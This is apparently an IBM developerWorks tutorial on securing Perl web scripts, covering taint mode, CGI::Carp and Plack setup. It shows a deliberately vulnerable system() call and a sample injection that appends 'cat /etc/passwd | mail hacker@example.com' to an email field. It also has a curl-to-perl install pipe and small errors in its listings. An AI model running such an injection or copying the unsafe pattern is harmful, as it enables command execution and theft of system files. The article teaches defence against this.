It sounds like an impossible prospect, but the only way to have completely safe script is to use one that neither uses data from the outside nor uses that data in some external connection or interface (such as running a command or connecting to a database). For some basic scripts, this can be perfectly reasonable.
But for the typical web application, accepting data from a form or other location, and then using that data in some form, is precisely the reason you are using a scripted solution in the first place.
Using such data could have serious consequences. For example, consider the example in Listing 1:
Listing 1. Typical script
#!/usr/bin/perl
use strict;
use warnings;
use CGI qw/:standard/;
my $query = new CGI();
my $email = $query->param(email);
system("mail $email") or die "Couldn't open mail"
|
The script looks harmless enough assuming that we will always get a completely valid email address. But because we are sending email using the
system()
function, the contents of the email address could be used to compromise the system. For
example, imagine if the supplied email address was:
example@example.com;
cat /etc/passwd | mail hacker@example.com
|
Now the email address not only contains a (possibly) valid email address but also an instruction to email somebody else your password file. The
system()
function opens a sub shell and executes the contents. This is a major security problem.
Tracking the origin of different sources of information would be difficult, if it wasn't
for a built-in mode provided by Perl called taint mode. Taint mode is automatically
enabled if Perl determines that the real and effective user IDs are different, or if you explicitly enabled the mode by using the
-T
option on the command line or shebang line at the start of the script.
With taint mode enabled, Perl checks the source and use of different data and variables to ensure that the information being used is not opening up the execution of the script to insecure or dangerous operations with information that cannot be trusted. As the name suggests, such data is classified as being tainted.
Perl identifies tainted data as any information that comes from the command line arguments, environment variables, locale information, and certain system calls (including those accessing directory, shared memory, and system data). In addition, all data that is read from an external file is also tainted.
Tainted information cannot be used directly or indirectly in any command that invokes a subshell (including piped input/output and the
system()
call or
exec()
calls) or any command that modifies files, or directories (such as writing, deleting or
renaming), or processes.
The exceptions to this rule are that
print()
(and derivatives) and
syswrite()
do not trigger a tainting error or sub-methods, sub-references, or hash keys.
The tainting functionality also extends automatically to monitor these values that are
suspect, even if you don't use them directly. For example, the value of the
PATH
environment variable is checked whenever you call
system()
or
exec(), regardless of whether you use a tainted variable in the
command-line since the command executed will be subject to the value of
PATH. The
PATH
is checked to ensure that each directory listed in the path is absolute and not writable
by people other than the owner and group. This prevents the command you are running from causing further problems.
Perl generates errors and stops execution if taint mode is enabled and it identifies a
tainted value being used. For example, using an insecure
PATH
generates the following error:
Insecure $ENV{PATH} while running with -T switch at t.pl line 11 |
While using an insecure variable raises this error:
Insecure dependency in system while running with -T switch at t2.pl line 2 |
Within a typical web application, it is the user supplied data from forms that is tainted, regardless of the method used to collect the information. Data from a CGI script can be obtained either from the standard input or environment variables (depending on the HTTP method and environment used), and both these are classed as tainted sources.
To protect both your script execution and ensure that you are not using insecure data, you need to be able to identify and then de-taint the information so that it is safe to use.
The normal way of reporting errors within a Perl script is to use the warn() or die() functions to report and generate errors. You might also use the
Carp
module, which provides additional levels of control over the messages that you raise, particularly within modules.
An additional module,
CGI::Carp
provides much of the same functionality as the
Carp
module. It is specially designed to be used within web scripts where you want error
information to go to a specific log, rather than the default web server log (for example,
one generated by Apache), or where you want the information to go to the web page in a controlled fashion.
The standard Carp module provides alternatives for the
warn()
and
die()
functions that provide more information and are more friendly in terms of providing the location of the error. When used within a module, for example, the error message includes the module name and line number.
Within the Carp module, the four main functions are carp(), which is a synonym for a warning message, and croak(), which is like
die()
and also terminates the script.
cluck() and confess()
are like warn() and die()
respectively but provide a stack back trace from the point where the error was raised.
If you use both the Carp and CGI::Carp modules, then the standard functions, such as
warn(), die(), and
Carp module functions, croak(),
confess(), and carp()
will now write their error information out to the configured HTTP server log with a date/time stamp and script source.
An alternative to using the HTTP server error log is to use
CGI::Carp and make use of the
carpout() function. This accepts a single argument, the filehandle of the file where you want errors (normally sent to STDERR) to be written. You have to import explicitly the
carpout() function. You can see a simple example in Listing 2.
Listing 2. Using
CGI::Carp
#!/usr/bin/perl
use strict;
use warnings;
use CGI::Carp qw/carpout/;
use IO::File;
my $logfile = IO::File->new('browser.log','w')
or die "Couldn't open logfile: $!\n";
carpout($logfile);
warn "Some error must have occurred\n";
|
The information generated in the log is identified with both the date and the name of the script that generated the output:
[Thu Sep 2 11:35:56 2010] carpout.cgi: Some error must have occurred |
All of these standardized methods assume that you want your error information to go to a log file. But, you may not always have access to the logs or want to be logged in to your browser to get the information.
The
CGI::Carp function therefore also provides a fatalsToBrowser option that redirects fatal error messages (
die(), confess()
) back to the browser, as well as to the web server log. This ensures that your users see the errors generated by the script. Non-fatal errors (warn() and carp()) will continue to go to the error log as normal.
To use, you must specify it as an option when loading the CGI::Carp module, use CGI::Carp
qw/fatalsToBrowser/;. We can add this to our file browsing script to ensure that errors are correctly reported and identified.
The tainting of information, and the use of CGI::Carp, are both
low-level issues and that can still be a cause for concern. However, the low-level
aspects of CGI applications, such as dealing with query arguments and outputting
header material, can be simplified by using one of a number of web application frameworks, such as Catalyst or Dancer. Plack works with frameworks or can be used on its own, as demonstrated below.
Plack is Perl super-glue for web frameworks and web servers. Plack sits between your code (whether you use a web framework or not) and the web server (for example, Apache, Starman, FCGI). This means that you (and your framework) do not need to worry about specifics of a web server and vice-versa.
Let's get you set-up. We are going to use cpanm (from App::cpanminus) to download and install modules into your local::lib (so you do not need root access). This is shown in Listing 3.
Listing 3. Initial setup
# archive of any existing cpan configuration mv ~/.cpan ~/.cpan_original # Then one of the following: # if you can run wget wget -O - http://cpanmin.us/ | perl - local::lib App::cpanminus && echo 'eval $(perl -I$HOME/perl5/lib/perl5 -Mlocal::lib)' >> ~/.bashrc && . ~/.bashrc # OR if you can run curl curl -L http://cpanmin.us/ | perl - local::lib App::cpanminus && echo 'eval $(perl -I$HOME/perl5/lib/perl5 -Mlocal::lib)' >> ~/.bashrc && . ~/.bashrc # otherwise, download the contents of http://cpanmin.us to a file called cpanmin.us, make it executable and then run: ./cpanmin.us local::lib App::cpanminus && echo 'eval $(perl -I$HOME/perl5/lib/perl5 -Mlocal::lib)' >> ~/.bashrc && . ~/.bashrc |
This installs the core Plack modules that are required to build web applications quickly and easily (see Listing 4 below).
Listing 4. Installing Plack with cpanminus
cpanm Task::Plack # Please also run this as we will use it later cpanm Plack::Middleware::TemplateToolkit |
The perl5 folder in your home directory will now have all the modules you need. The next step is to create a .psgi configuration file which will allow us to return a web page (see Listing 5 below).
Listing 5. Creating a .psgi configuration file
# Tell Perl where our lib is (ALWAYS use this)
use lib "$ENV{HOME}/perl5/lib/perl5";
# ensure we declare everything correctly (ALWAYS use this)
use strict;
# Give us diagnostic warnings where possible (ALWAYS use this)
use warnings;
# Allow us to build our application
use Plack::Builder;
# A basic app
my $default_app = sub {
my $env = shift;
return [
200, # HTTP Status code
[ 'Content-Type' => 'text/html' ], # HTTP Headers,
["All is good"] # Content
];
};
# Return the builder
return builder {
$default_app;
}
|
Save this to a file, called 1.psgi, then use the plackup command to start your web server from the command line as follows:
plackup 1.psgi. You will see:
HTTP::Server::PSGI: Accepting connections at http://SERVER_IP:5000/.
Using your web browser, go to http://SERVER_IP:5000/. If you
are developing on your desktop computer, then http://localhost:5000/
will work. You should now see a page with "All is good". In fact, if you go to any page this is what you will see
http://localhost:5000/any_page.html
because we are always returning this, irrespective of the request.
You will notice that on the command line you can see the access logs for the web server. This is because Plack defaults to development mode and turns on a few extra middleware layers for you, specifically AccessLog, StackTrace and Lint.
To see StackTrace in operation, comment out line 27 of Listing 4 by adding a hash (#) in front of it:
# ["All is good"] # Content.
Restart your plackup command (type Ctrl+C to stop the process,
then run plackup 1.psgi to
start it). Now, in your web browser go to
http://localhost:5000/
again and you will see a StackTrace of the error. Note the main error message at the top of the page "response needs to be 3 element array, or 2 element in streaming". You can then follow each step of the trace, click on the Show function arguments and Show lexical variables links under any section of the trace to help debug the issue.
Remove the # and restart, so we have a working .psgi file again.
There are several command line arguments to the plackup
command, running perldoc plackup command will show you the documentation. The most used is -r or
--reload;
this tells plackup to monitor your .psgi file (if you have a lib directory along side your .psgi file it will also be monitored):
plackup -r 1.psgi.
Plack already has many useful applications that you may want to integrate with your web
portal. In
Listing 6, for example, we are using
Plack::App::Directory
to get a directory listing and to serve it's content as static files. We will use
Plack::App::URLMap
to choose which URL we want to mount this application on.
Listing 6. Second .psgi configuration file
use lib "$ENV{HOME}/perl5/lib/perl5";
use strict;
use warnings;
use Plack::Builder;
# 'mount' applications on specific URLs
use Plack::App::URLMap;
# Get directory listings and serve files
use Plack::App::Directory;
my $default_app = sub {
my $env = shift;
return [ 200, [ 'Content-Type' => 'text/html' ], ["All is good"] ];
};
# Get the Directory app, configured with a root directory
my $dir_app = Plack::App::Directory->new( { root => "/tmp/" } )->to_app;
# Create a mapper object
my $mapper = Plack::App::URLMap->new();
# mount our apps on urls
$mapper->mount('/' => $default_app);
$mapper->mount('/tmp' => $dir_app);
# extract the new overall app from the mapper
my $app = $mapper->to_app();
# Return the builder
return builder {
$app;
}
|
The code in Listing 6 mounts $dir_app to /tmp/ ( open http://localhost:5000/tmp/ ) and still falls through to
the $default_app for / e.g. any other path
( open http://localhost:500/anything_else.html ).
There are many Plack::Apps and Plack::Middleware modules available to help with common tasks. We are
going to look at Plack::Middleware::TemplateToolkit, which
parses files through the templating engine Template-Toolkit (TT). Images and other
static content should not go through TT, so we are going to configure Plack::Middleware::Static to serve files directly with specific
extensions. On top of this we want to have a nice looking page when there is a 404 (file not found); for this we will use Plack::Middleware::ErrorDocument. All the code we need to add is shown in Listing 7.
Listing 7. The
Plack::Middleware::TemplateToolkit module
# A link to your htdocs root folder
my $root = '/path/to/htdocs/';
# Create a new template toolkit application (which we will default to)
my $default_app = Plack::Middleware::TemplateToolkit->new(
INCLUDE_PATH => $root, # Required
)->to_app();
return builder {
# Page to show when requested file is missing
# this will not be processes with TT
enable "Plack::Middleware::ErrorDocument",
404 => "$root/page_not_found.html";
# These files can be served directly
enable "Plack::Middleware::Static",
path => qr{[gif|png|jpg|swf|ico|mov|mp3|pdf|js|css]$},
root => $root;
# Our application
$default_app;
}
|
At this stage, it is probably worth investigating one of the many web frameworks that offer PSGI support and can be run with Plack. These frameworks offer structure and support for doing more complex tasks. Have a look at Catalyst, Mojolicious, or Dancer. The Perl.org web frameworks white paper (see Resources for a link) discusses just a few of the advantages of using a framework.
Parsing and using web data within a Perl web portal script is complex because of the needs of securing the information that you are receiving from the user. Once you grant access to the underlying filesystem through your Perl script, you must ensure that the CGI script cannot gain access to files that you do not want accessible to the outside world.
Plack doesn't eliminate the need to worry about these elements, but it does make the process of building advanced web applications system much easier. Plack handles all of these issues and provides a simplified environment for building web applications. Plack handles all of the complexities between your web server and your Perl application, both simplifying and protecting your application and server.
Learn
-
XML for Perl developers, Part 1: XML plus Perl -- simply magic
(Jim Dixon, developerWorks, January 2007): This series is a guide to those who need a quick XML-and-Perl solution. In a surprisingly large number of cases, you only need one tool to integrate XML into a Perl application, XML::Simple.
-
Perl developers: Fill your XML toolbox
(Parand Darugar, developerWorks, June 2001): Explore an overview of some 20 essential tools and libraries for manipulating XML with Perl.
-
Effective XML processing with DOM and XPath in Perl
(Parand Darugar, developerWorks, October 2001): Examine how to make effective and efficient use of DOM.
-
High-order Perl
(Mark Jason Dominus, 2005): Read a book about functional programming techniques in Perl and how to write functions that can modify and manufacture other functions.
-
Visit the home of the
Perl programming language.
-
Learn more about Perl web frameworks.
-
AIX and UNIX
: The AIX and UNIX developerWorks zone provides a wealth of information relating to all aspects of AIX systems administration and expanding your UNIX skills.
-
New to AIX and UNIX?: Visit the New to AIX and UNIX page to learn more about AIX and UNIX.
-
Search the AIX and UNIX library by topic:
- System administration
- Application development
- Performance
- Porting
- Security
- Tips
- Tools and utilities
- Java™ technology
- Linux®
- Open source
-
Safari bookstore: Visit this e-reference library to find specific technical resources.
-
Follow
developerWorks on Twitter..
-
For an article series that will teach you how to program in bash, see
Bash by example, Part 1: Fundamental programming in the Bourne again shell (bash)
(Daniel Robbins, developerWorks, March 2000),
Bash by example, Part 2: More bash programming fundamentals
(Daniel Robbins, developerWorks, April 2000), and
Bash by example, Part 3: Exploring the ebuild system
(Daniel Robbins, developerWorks, May 2000).
-
Making
UNIX and Linux work together
(Martin Brown, developerWorks, April 2006) is a guide to getting traditional Unix distributions and Linux working together.
-
To listen to interesting interviews and discussions for software developers, check out
developerWorks podcasts.
-
developerWorks technical events and webcasts: Stay current with developerWorks technical events and webcasts.
Get products and technologies
- Try out IBM software for free. Download a trial version, log into an online trial, work with a product in a sandbox environment, or access it through the cloud. Choose from over 100 IBM product trials.
-
Download
Perl.
-
Get the
cpanminus tool.
-
Visit the home of the
Plack web application system.
-
Innovate your next open source development project with
IBM trial software, available for download or on DVD.
Discuss
-
Participate in
developerWorks blogs
and get involved in the developerWorks community.

Martin Brown has been a professional writer for more than seven years. He is the author of numerous books and articles across a range of topics. His expertise spans myriad development languages and platforms -- Perl, Python, Java™, JavaScript, Basic, Pascal, Modula-2, C, C++, Rebol, Gawk, Shellscript, Windows®, Solaris, Linux, BeOS, Mac OS X and more -- as well as Web programming, systems management, and integration. He is a Subject Matter Expert (SME) for Microsoft® and regular contributor to ServerWatch.com, LinuxToday.com, and IBM developerWorks. He is also a regular blogger at Computerworld, The Apple Blog, and other sites. You can contact him through his Web site.

Leo Lapworth focuses on rapid development and finding solutions to problems. Content doesn't usually matter to him; what matters is what can be achieved and how he can make things better for company, client, and users. He mostly works with open source systems (LAMP) focusing on Perl and is an active member of the London Perl community.




